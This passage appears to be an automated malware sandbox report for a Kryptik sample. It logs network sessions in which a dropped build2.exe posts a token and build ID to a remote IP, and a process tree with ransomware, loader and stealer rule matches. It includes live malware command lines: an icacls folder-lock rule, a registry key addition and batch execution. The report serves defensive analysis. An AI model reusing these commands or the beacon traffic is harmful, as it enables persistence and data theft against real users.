2024-04-04 15:49:50 UTC	16355	OUT	Data Raw: 43 55 55 74 4a 54 47 46 4a 53 30 6c 41 77 78 53 55 74 46 41 43 55 6c 4f 78 53 55 78 69 63 30 6c 4f 70 4d 55 41 4a 52 69 6c 6f 4e 41 44 63 55 55 74 49 61 42 68 53 59 70 61 4b 59 43 41 55 55 74 4a 51 4d 4b 53 6c 70 44 54 51 42 69 6a 46 46 46 4d 59 59 6f 78 52 52 53 41 51 64 52 57 37 63 2f 36 2f 38 41 34 43 76 38 71 77 68 31 72 64 75 66 39 66 38 41 38 42 58 2b 51 72 47 70 38 53 48 48 34 69 47 69 69 69 67 31 45 6f 6f 70 61 41 45 6f 4e 4c 51 61 41 45 70 4d 55 55 74 41 77 70 4d 55 37 46 47 4b 41 47 30 55 70 70 42 54 41 57 69 69 69 67 42 6b 76 2f 48 72 63 66 38 41 58 49 2f 7a 46 55 4e 4e 47 5a 32 2f 33 61 76 79 2f 77 44 48 72 63 66 39 63 6a 2f 53 73 2f 54 66 39 65 33 2b 37 52 48 5a 69 4e 49 55 55 55 76 34 30 46 43 59 78 51 4b 43 61 42 51 41 55 55 63 30 55 41 4a Data Ascii: CUUtJTGFJS0lAwxSUtFACUlOxSUxic0lOpMUAJRiloNADcUUtIaBhSYpaKYCAUUtJQMKSlpDTQBijFFFMYYoxRRSAQdRW7c/6/8A4Cv8qwh1rduf9f8A8BX+QrGp8SHH4iGiiig1EoopaAEoNLQaAEpMUUtAwpMU7FGKAG0UppBTAWiiigBkv/Hrcf8AXI/zFUNNGZ2/3avy/wDHrcf9cj/Ss/Tf9e3+7RHZiNIUUUv40FCYxQKCaBQAUUc0UAJ
2024-04-04 15:49:50 UTC	16355	OUT	Data Raw: 58 4c 44 63 45 48 37 77 65 32 2f 38 41 38 64 78 78 57 74 53 31 72 48 42 55 34 4b 30 4c 72 71 59 54 7a 53 74 55 6c 65 70 61 58 71 69 47 32 61 52 6f 63 79 4b 56 59 6b 6e 61 54 6e 41 39 4b 6d 70 4b 4b 36 30 72 4b 78 35 30 70 63 30 6d 78 61 4b 50 77 6f 70 69 4d 69 36 74 6f 5a 6b 2b 7a 58 64 68 65 54 4b 6c 31 4a 63 78 54 57 31 79 73 65 43 36 6f 75 43 70 6a 62 49 2b 51 48 67 6a 72 56 65 59 36 67 5a 64 4d 6c 74 62 4a 34 58 30 6d 56 47 73 53 38 75 38 42 42 67 6c 5a 42 67 62 73 75 43 32 65 4d 62 69 4f 6d 33 47 2f 52 6d 75 47 57 58 30 70 53 63 6e 33 75 65 70 54 7a 66 45 51 67 6f 4b 32 69 74 74 30 4d 69 7a 4c 61 58 4e 4b 32 6d 57 57 70 32 73 4e 78 43 38 4d 79 78 36 69 56 6d 54 4c 42 67 59 70 56 6a 42 58 42 55 64 51 32 52 6b 48 72 55 61 51 33 4d 31 31 47 72 70 65 75 Data Ascii: XLDcEH7we2/8A8dxxWtS1rHBU4K0LrqYTzStUlepaXqiG2aRocyKVYknaTnA9KmpKK60rKx50pc0mxaKPwopiMi6toZk+zXdheTKl1JcxTW1yseC6ouCpjbI+QHgjrVeY6gZdMltbJ4X0mVGsS8u8BBglZBgbsuC2eMbiOm3G/RmuGWX0pScn3uepTzfEQgoK2itt0MizLaXNK2mWWp2sNxC8Myx6iVmTLBgYpVjBXBUdQ2RkHrUaQ3M11Grpeu
2024-04-04 15:49:50 UTC	8454	OUT	Data Raw: 34 41 66 32 50 2f 41 48 2f 77 2f 77 43 43 65 71 30 6c 65 56 30 55 66 32 74 2f 63 2f 48 2f 41 49 41 2f 37 48 2f 76 2f 68 2f 77 54 31 4f 69 76 4c 4b 4b 50 37 58 2f 41 4c 6e 34 2f 77 44 41 44 2b 79 50 37 2f 34 66 38 45 39 53 6f 72 79 32 69 6a 2b 31 2f 77 43 35 2b 50 38 41 77 42 2f 32 52 2f 66 2f 41 41 2f 34 4a 36 6a 53 56 35 66 52 52 2f 61 2f 39 7a 38 66 2b 41 48 39 6b 66 33 2f 41 4d 50 2b 43 65 6e 30 56 35 68 52 52 2f 61 2f 39 7a 38 66 2b 41 50 2b 79 66 37 2f 41 4f 48 2f 41 41 54 30 36 67 31 35 6a 53 55 66 32 76 38 41 33 50 78 2f 34 41 66 32 54 2f 66 2f 41 41 2f 34 4a 36 64 53 56 35 6c 52 52 2f 61 2f 39 7a 38 66 2b 41 50 2b 79 66 37 2f 41 4f 48 2f 41 41 54 30 32 6b 72 7a 4f 69 6a 2b 31 2f 37 6e 34 2f 38 41 41 44 2b 79 76 37 2f 34 66 38 45 39 4c 4e 4a 58 6d Data Ascii: 4Af2P/AH/w/wCCeq0leV0Uf2t/c/H/AIA/7H/v/h/wT1OivLKKP7X/ALn4/wDAD+yP7/4f8E9Sory2ij+1/wC5+P8AwB/2R/f/AA/4J6jSV5fRR/a/9z8f+AH9kf3/AMP+Cen0V5hRR/a/9z8f+AP+yf7/AOH/AAT06g15jSUf2v8A3Px/4Af2T/f/AA/4J6dSV5lRR/a/9z8f+AP+yf7/AOH/AAT02krzOij+1/7n4/8AAD+yv7/4f8E9LNJXm
2024-04-04 15:49:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:51 UTC	18	IN	Data Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 8YmxvY2s=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	49818	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:52 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------IJDGIIEBFCBAAAAKKEGHCont
2024-04-04 15:49:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	49819	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:54 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------JJKEBGHJKFIDGCAAFCAFCont
2024-04-04 15:49:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	17:48:21
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe"
Imagebase:	0x400000
File size:	296'960 bytes
MD5 hash:	E478A6638150036E4009BEB1530187BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:48:28
Start date:	04/04/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:48:47
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Roaming\fcbhtea
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\fcbhtea
Imagebase:	0x400000
File size:	296'960 bytes
MD5 hash:	E478A6638150036E4009BEB1530187BB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1682340416.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1682669185.0000000002ED8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:48:50
Start date:	04/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C2.bat" "
Imagebase:	0x7ff7faaf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:48:50
Start date:	04/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:48:50
Start date:	04/04/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Imagebase:	0x7ff6e5ea0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:48:55
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1601.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1601.exe
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:48:57
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1601.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1601.exe
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:48:59
Start date:	04/04/2024
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x6a0000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:48:59
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.1771122614.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:49:00
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.1764276371.00000000048C1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:49:01
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	17:49:02
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	17:49:05
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"
Imagebase:	0x400000
File size:	326'144 bytes
MD5 hash:	4FBDCB0EE049B71CB8B9A68BF69F9E0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.1803546688.0000000000AD1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:49:05
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"
Imagebase:	0x400000
File size:	326'144 bytes
MD5 hash:	4FBDCB0EE049B71CB8B9A68BF69F9E0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:49:08
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\Temp\455F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\455F.exe
Imagebase:	0x160000
File size:	6'824'024 bytes
MD5 hash:	9E52AA572F0AFC888C098DB4C0F687FF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:49:10
Start date:	04/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4DCC.bat" "
Imagebase:	0x7ff7faaf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	17:49:10
Start date:	04/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	17:49:10
Start date:	04/04/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Imagebase:	0x7ff6e5ea0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	17:49:10
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.1943356920.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:49:12
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.1897883269.000000000482F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:49:14
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
